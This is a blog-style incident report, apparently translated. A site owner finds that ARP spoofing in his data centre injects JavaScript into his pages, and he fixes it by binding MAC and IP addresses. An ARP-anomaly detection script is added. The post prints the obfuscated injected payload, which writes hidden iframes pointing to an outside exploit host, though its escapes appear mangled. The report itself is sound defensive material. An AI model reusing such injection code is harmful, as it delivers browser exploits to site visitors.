Last night I discovered that when I visited my website, there was a string of JS code in front of the HTML code of the web page. At first I thought the website had been hacked, so I hurriedly went to the server to check all files for this string of JS code. The search turned up nothing, and I did not find any trace of the server being hacked.
So I could only start from this code. I downloaded the JS file and found the following code:
window["x64x6fx63x75x6dx65x6ex74" ]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d"x4 3x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6b x2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x31x2ex67x69x66'x29"x3e");
window["x64x6fx63x75x6dx65x6ex74 "]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56 x73x74x79x6cx65x3d" x43x55x52x53x4fx52x3a x75x72x6cx28'x68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70 x69x63/x32x2ex67x69x66'x29"x3ex3c/x44x49x56x3ex3c/x44x49x56x3e"); "x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6b 9x63/ x30x36x30x31x34x2ex68x74x6d x77x69x64x74x68x3dx31 x68x65x69x67x68x74x3dx31x3ex3c/x69x66x72x61x6dx65x3e");
window["x64x6fx63 x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x66x75x63x6bx2ex6ex73x32x67x6fx 2ex63x6fx6d/x64x69x72/x69x6ex64x65x78x5fx70x69x63/x74x6ax2ex68x74x6d x77x69x64x74x68x3dx30 66x72x61x6dx65x3e")
After searching on Google, I found that someone else had run into the same situation: http://0e2.net/post/676.html
After reading this article, I learned that it was not the server that was hacked, but the computer room where the server is located: a host there infected with the Trojan was carrying out ARP spoofing.
After these Trojans captured the packets sent by my server, they tampered with the content of the packets and added the Trojan code shown above to the HTML header. Then they forwarded the packets to the users who visit my website. This Trojan targets the ANI vulnerability of IE. Microsoft users' computers must be upgraded and patched as soon as possible.
The final problem was how to prevent my server from being spoofed by ARP. I called the computer room, the technical staff asked us to bind the MAC and IP addresses, and the problem was finally solved.
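A check for the condition described above, as an added example that is not part of the original post: it parses Linux "ip neigh show" output and flags an IP whose MAC differs from its bound value, or one MAC answering for several IPs. The sample table, all addresses and the PINNED map are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output (Linux); addresses are made up.
# Here 192.0.2.23 is answering ARP for the gateway 192.0.2.1 as well as itself.
SAMPLE_NEIGH = """\
192.0.2.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.0.2.10 dev eth0 lladdr 00:11:22:33:44:0a STALE
192.0.2.23 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.0.2.40 dev eth0  FAILED
"""

# Hypothetical bindings: the MAC each critical IP is supposed to have.
PINNED = {"192.0.2.1": "00:11:22:33:44:01"}

LINE_RE = re.compile(r"^(\S+)\s+dev\s+\S+\s+lladdr\s+([0-9a-fA-F:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for entries that have a resolved link-layer address."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # unresolved entries (FAILED/INCOMPLETE) have no lladdr
            table[m.group(1)] = m.group(2).lower()
    return table

def find_anomalies(table, pinned):
    """Return (kind, where, mac) tuples for signs of ARP spoofing."""
    findings = []
    # 1. A bound IP currently resolves to a different MAC.
    for ip, mac in sorted(pinned.items()):
        seen = table.get(ip)
        if seen is not None and seen != mac.lower():
            findings.append(("pinned-mismatch", ip, seen))
    # 2. One MAC claims several IPs. This can be legitimate (a multi-homed
    #    host), so treat it as a lead to investigate, not as proof.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(("mac-shared", ",".join(sorted(ips)), mac))
    return findings

if __name__ == "__main__":
    for kind, where, mac in find_anomalies(parse_neigh(SAMPLE_NEIGH), PINNED):
        print(f"{kind}: {where} -> {mac}")
```

Once an address is bound statically on the server, its entry appears in the neighbour table with state PERMANENT and is no longer overwritten by ARP replies.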
Background on ARP spoofing:
http://zhidao.baidu.com/question/7980952.html?si=1